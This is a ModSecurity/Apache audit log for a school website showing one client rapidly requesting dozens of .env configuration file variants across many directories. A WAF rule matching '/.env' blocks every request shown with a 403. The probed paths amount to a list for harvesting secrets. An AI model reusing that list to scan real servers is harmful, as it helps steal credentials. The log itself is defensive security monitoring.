Stopwatch2: 1745151905841660 805; combined=288, p1=254, p2=0, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d0c0865a-Z--
--4f36eb72-A--
[20/Apr/2025:19:25:05 +0700] aATnoUAzeWrUIk0gvAsr5wAAAMU 103.236.140.4 38408 103.236.140.4 8181
--4f36eb72-B--
GET /back/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--4f36eb72-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4f36eb72-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151905913190 540 (- - -)
Stopwatch2: 1745151905913190 540; combined=208, p1=181, p2=0, p3=0, p4=0, p5=27, sr=53, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4f36eb72-Z--
--6972c744-A--
[20/Apr/2025:19:25:05 +0700] aATnoUAzeWrUIk0gvAsr6AAAAM0 103.236.140.4 38410 103.236.140.4 8181
--6972c744-B--
GET /download/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--6972c744-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6972c744-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151905983496 616 (- - -)
Stopwatch2: 1745151905983496 616; combined=238, p1=212, p2=0, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6972c744-Z--
--d672054a-A--
[20/Apr/2025:19:25:06 +0700] aATnokAzeWrUIk0gvAsr6QAAAMk 103.236.140.4 38412 103.236.140.4 8181
--d672054a-B--
GET /docker/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--d672054a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d672054a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151906053268 707 (- - -)
Stopwatch2: 1745151906053268 707; combined=253, p1=215, p2=0, p3=0, p4=0, p5=37, sr=65, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d672054a-Z--
--42db4724-A--
[20/Apr/2025:19:25:06 +0700] aATnokAzeWrUIk0gvAsr6gAAAME 103.236.140.4 38414 103.236.140.4 8181
--42db4724-B--
GET /cms/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--42db4724-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--42db4724-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151906123183 690 (- - -)
Stopwatch2: 1745151906123183 690; combined=275, p1=247, p2=0, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--42db4724-Z--
--6486987e-A--
[20/Apr/2025:19:25:06 +0700] aATnosTCDeBrh52UaHS-TQAAAIc 103.236.140.4 38416 103.236.140.4 8181
--6486987e-B--
GET /content/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--6486987e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6486987e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151906193753 785 (- - -)
Stopwatch2: 1745151906193753 785; combined=316, p1=282, p2=0, p3=0, p4=0, p5=34, sr=119, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6486987e-Z--
--8ed5dc2a-A--
[20/Apr/2025:19:25:06 +0700] aATnosTCDeBrh52UaHS-TgAAAIg 103.236.140.4 38418 103.236.140.4 8181
--8ed5dc2a-B--
GET /.env.production HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--8ed5dc2a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8ed5dc2a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151906264421 677 (- - -)
Stopwatch2: 1745151906264421 677; combined=256, p1=222, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8ed5dc2a-Z--
--ef4c7500-A--
[20/Apr/2025:19:25:06 +0700] aATnolTf0pL9EQC7JDUZ3QAAAEQ 103.236.140.4 38420 103.236.140.4 8181
--ef4c7500-B--
GET /user/.env.staging HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--ef4c7500-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ef4c7500-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151906334739 712 (- - -)
Stopwatch2: 1745151906334739 712; combined=273, p1=237, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ef4c7500-Z--
--59c75770-A--
[20/Apr/2025:19:25:06 +0700] aATnolu16wJWB6g0mU8NrwAAABY 103.236.140.4 38422 103.236.140.4 8181
--59c75770-B--
GET /.env.bak HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--59c75770-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--59c75770-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151906411311 681 (- - -)
Stopwatch2: 1745151906411311 681; combined=253, p1=221, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--59c75770-Z--
--2eda176d-A--
[20/Apr/2025:19:25:06 +0700] aATnosTCDeBrh52UaHS-TwAAAJY 103.236.140.4 38424 103.236.140.4 8181
--2eda176d-B--
GET /files/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--2eda176d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2eda176d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151906481951 644 (- - -)
Stopwatch2: 1745151906481951 644; combined=244, p1=212, p2=0, p3=0, p4=0, p5=32, sr=63, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2eda176d-Z--
--dc17111c-A--
[20/Apr/2025:19:25:06 +0700] aATnosTCDeBrh52UaHS-UAAAAIw 103.236.140.4 38426 103.236.140.4 8181
--dc17111c-B--
GET /env/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--dc17111c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dc17111c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151906552154 698 (- - -)
Stopwatch2: 1745151906552154 698; combined=280, p1=245, p2=0, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dc17111c-Z--
--82207668-A--
[20/Apr/2025:19:25:06 +0700] aATnokAzeWrUIk0gvAsr6wAAAMQ 103.236.140.4 38428 103.236.140.4 8181
--82207668-B--
GET /shared/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--82207668-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--82207668-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151906621887 690 (- - -)
Stopwatch2: 1745151906621887 690; combined=270, p1=242, p2=0, p3=0, p4=0, p5=27, sr=74, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--82207668-Z--
--4b153a18-A--
[20/Apr/2025:19:25:06 +0700] aATnokAzeWrUIk0gvAsr7AAAAMw 103.236.140.4 38430 103.236.140.4 8181
--4b153a18-B--
GET /fedex/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--4b153a18-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4b153a18-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151906692153 688 (- - -)
Stopwatch2: 1745151906692153 688; combined=287, p1=260, p2=0, p3=0, p4=0, p5=27, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4b153a18-Z--
--5cd01123-A--
[20/Apr/2025:19:25:06 +0700] aATnolu16wJWB6g0mU8NsQAAAAg 103.236.140.4 38436 103.236.140.4 8181
--5cd01123-B--
GET /.env.dist HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--5cd01123-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5cd01123-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151906762181 687 (- - -)
Stopwatch2: 1745151906762181 687; combined=268, p1=235, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5cd01123-Z--
--105e3d14-A--
[20/Apr/2025:19:25:06 +0700] aATnolTf0pL9EQC7JDUZ3gAAAEI 103.236.140.4 38438 103.236.140.4 8181
--105e3d14-B--
GET /rest/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--105e3d14-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--105e3d14-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151906832873 812 (- - -)
Stopwatch2: 1745151906832873 812; combined=298, p1=259, p2=0, p3=0, p4=0, p5=38, sr=72, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--105e3d14-Z--
--78cea856-A--
[20/Apr/2025:19:25:06 +0700] aATnokAzeWrUIk0gvAsr7QAAAMs 103.236.140.4 38440 103.236.140.4 8181
--78cea856-B--
GET /.env.project HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--78cea856-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--78cea856-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151906903674 702 (- - -)
Stopwatch2: 1745151906903674 702; combined=259, p1=220, p2=0, p3=0, p4=0, p5=39, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--78cea856-Z--
--03108a13-A--
[20/Apr/2025:19:25:06 +0700] aATnolTf0pL9EQC7JDUZ3wAAAEo 103.236.140.4 38442 103.236.140.4 8181
--03108a13-B--
GET /product/.env.staging HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--03108a13-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--03108a13-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151906973489 567 (- - -)
Stopwatch2: 1745151906973489 567; combined=216, p1=189, p2=0, p3=0, p4=0, p5=27, sr=56, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--03108a13-Z--
--cca53d76-A--
[20/Apr/2025:19:25:07 +0700] aATno1Tf0pL9EQC7JDUZ4AAAAFM 103.236.140.4 38444 103.236.140.4 8181
--cca53d76-B--
GET /_static/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--cca53d76-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cca53d76-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151907044452 652 (- - -)
Stopwatch2: 1745151907044452 652; combined=254, p1=223, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cca53d76-Z--
--d8eb3529-A--
[20/Apr/2025:19:25:07 +0700] aATno1Tf0pL9EQC7JDUZ4QAAAEU 103.236.140.4 38446 103.236.140.4 8181
--d8eb3529-B--
GET /.env.www HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--d8eb3529-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d8eb3529-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151907114685 674 (- - -)
Stopwatch2: 1745151907114685 674; combined=256, p1=222, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d8eb3529-Z--
--5f923d08-A--
[20/Apr/2025:19:25:07 +0700] aATno1Tf0pL9EQC7JDUZ4gAAAFY 103.236.140.4 38448 103.236.140.4 8181
--5f923d08-B--
GET /.env_1 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--5f923d08-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5f923d08-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151907184353 651 (- - -)
Stopwatch2: 1745151907184353 651; combined=247, p1=214, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0
